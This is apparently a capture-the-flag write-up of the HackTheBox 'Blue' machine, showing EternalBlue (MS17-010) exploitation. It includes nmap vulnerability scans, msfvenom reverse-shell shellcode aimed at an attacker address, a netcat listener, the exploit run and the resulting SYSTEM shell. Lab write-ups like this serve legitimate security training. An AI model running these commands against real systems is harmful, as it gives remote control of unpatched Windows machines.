In May 2017 a ransomware named WannaCry tore through a number of Windows systems encrypting the user’s hard drive and asking for payment in bitcoin in order to decrypt [User’s were duped!].
The Blue box makes the solver aware of the vulnerability which allowed the WannaCry to wreak havoc. Many articles point to the NSA that they discovered this vulnerability and found the exploit. Here comes the group named Shadow Brokers who stole the exploit. The vulnerability can be found under CVE-2017–0144 .
The Server Message Block (SMB) protocol is a network file sharing protocol that allows applications on a computer to read and write to files and to request services from server programs in a computer network. The vulnerability could allow remote code execution if an attacker sends a crafted message to the SMBv1 server.
Enough of the history lesson, let’s move into how I cracked the box.
Let’s start by doing a port scan
┌──(kali㉿kali)-[~/HackTheBox/Blue/recon]
└─$ nmap -sC -sV -p0-1000 10.10.10.40 > results.txt &
[1] 1377
┌──(kali㉿kali)-[~/HackTheBox/Blue/recon]
└─$ 1 ⚙
[1] + done nmap -sC -sV -p0-1000 10.10.10.40 > results.txt
┌──(kali㉿kali)-[~/HackTheBox/Blue/recon]
└─$ cat results.txt 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-12 08:07 EST
Nmap scan report for 10.10.10.40
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: 40s, deviation: 1s, median: 39s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-01-12T13:08:13+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-01-12T13:08:12
|_ start_date: 2021-01-12T13:03:41Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.29 seconds
From here we can identify that the system is a Windows 7 Professional , Service Pack 1. The computer name is haris-PC, and we got port 445 running SMB, 135 running RPC and 139 running NetBIOS-SSN.
First google of the OS details landed me to the exploit-db page which describes about the MS17–010 aka Eternal Blue.
Before jumping the gun let’s find out if the system is even vulnerable to Eternal Blue. Here is where some of the nmap features helps you out.
NSE, vulnerability scanning.
──(kali㉿kali)-[~/HackTheBox/Blue/recon]
└─$ nmap -p 445 --script vuln 10.10.10.40 > smbvulnerability.txt &
[1] 1575
┌──(kali㉿kali)-[~/HackTheBox/Blue/recon]
└─$ 1 ⚙
[1] + done nmap -p 445 --script vuln 10.10.10.40 > smbvulnerability.txt
┌──(kali㉿kali)-[~/HackTheBox/Blue/recon]
└─$ cat smbvulnerability.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-12 08:25 EST
Nmap scan report for 10.10.10.40
Host is up (0.20s latency).PORT STATE SERVICE
445/tcp open microsoft-dsHost script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/Nmap done: 1 IP address (1 host up) scanned in 27.82 seconds
We can see that the system is vulnerable to smb-vuln-ms17–010.
We found the vulnerability now to exploit it.
Using the AutoBlue-MS17–010 as the exploit.
Preparing the shell-code,I was unable to automatically compile the shell-code using the shell_prep. Doing it manually.
┌──(kali㉿kali)-[~/…/Blue/exploits/AutoBlue-MS17-010/shellcode]
└─$ nasm -f bin eternalblue_kshellcode_x64.asm -o myexploit.bin;nasm -f bin eternalblue_kshellcode_x86.asm -o sc_x86_kernel.bin┌──(kali㉿kali)-[~/…/Blue/exploits/AutoBlue-MS17-010/shellcode]
└─$ msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.7 LPORT=54;msfvenom -p windows/x64/shell_reverse_tcp EXITFUNC=thread LHOST=10.10.14.7 LPORT=53 -f raw -o sc_x64_msf.bin;cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin;cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin;python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin
┌──(kali㉿kali)-[~/…/Blue/exploits/AutoBlue-MS17-010/shellcode]
└─$
Let’s listen to port 53,
┌──(kali㉿kali)-[~]
└─$ sudo nc -nvlp 53 1 ⨯
[sudo] password for kali:
listening on [any] 53 ...
Running the exploit,
┌──(kali㉿kali)-[~/HackTheBox/Blue/exploits/AutoBlue-MS17-010]
└─$ python3 eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
In the nc we got,
┌──(kali㉿kali)-[~]
└─$ sudo nc -nvlp 53 1 ⨯
[sudo] password for kali:
listening on [any] 53 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\Windows\system32>cd C:\Users
cd C:\UsersC:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911Directory of C:\Users21/07/2017 06:56 <DIR> .
21/07/2017 06:56 <DIR> ..
21/07/2017 06:56 <DIR> Administrator
14/07/2017 13:45 <DIR> haris
12/04/2011 07:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 15,890,034,688 bytes freeC:\Users>
Getting the User Flag,
C:\Users>cd haris
cd harisC:\Users\haris>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911Directory of C:\Users\haris14/07/2017 13:45 <DIR> .
14/07/2017 13:45 <DIR> ..
15/07/2017 07:58 <DIR> Contacts
24/12/2017 02:23 <DIR> Desktop
15/07/2017 07:58 <DIR> Documents
15/07/2017 07:58 <DIR> Downloads
15/07/2017 07:58 <DIR> Favorites
15/07/2017 07:58 <DIR> Links
15/07/2017 07:58 <DIR> Music
15/07/2017 07:58 <DIR> Pictures
15/07/2017 07:58 <DIR> Saved Games
15/07/2017 07:58 <DIR> Searches
15/07/2017 07:58 <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 15,890,034,688 bytes freeC:\Users\haris>cd Desktop
cd DesktopC:\Users\haris\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911Directory of C:\Users\haris\Desktop24/12/2017 02:23 <DIR> .
24/12/2017 02:23 <DIR> ..
21/07/2017 06:54 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 15,890,034,688 bytes freeC:\Users\haris\Desktop>
Similarly getting the Admin Flag
C:\Users>cd Administrator
cd AdministratorC:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911Directory of C:\Users\Administrator21/07/2017 06:56 <DIR> .
21/07/2017 06:56 <DIR> ..
21/07/2017 06:56 <DIR> Contacts
24/12/2017 02:22 <DIR> Desktop
21/07/2017 06:56 <DIR> Documents
21/07/2017 06:56 <DIR> Downloads
21/07/2017 06:56 <DIR> Favorites
21/07/2017 06:56 <DIR> Links
21/07/2017 06:56 <DIR> Music
21/07/2017 06:56 <DIR> Pictures
21/07/2017 06:56 <DIR> Saved Games
21/07/2017 06:56 <DIR> Searches
21/07/2017 06:56 <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 15,890,034,688 bytes freeC:\Users\Administrator>cd Desktop
cd DesktopC:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911Directory of C:\Users\Administrator\Desktop24/12/2017 02:22 <DIR> .
24/12/2017 02:22 <DIR> ..
21/07/2017 06:57 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 15,890,034,688 bytes freeC:\Users\Administrator\Desktop>
This is how I solved Blue from HackTheBox. :)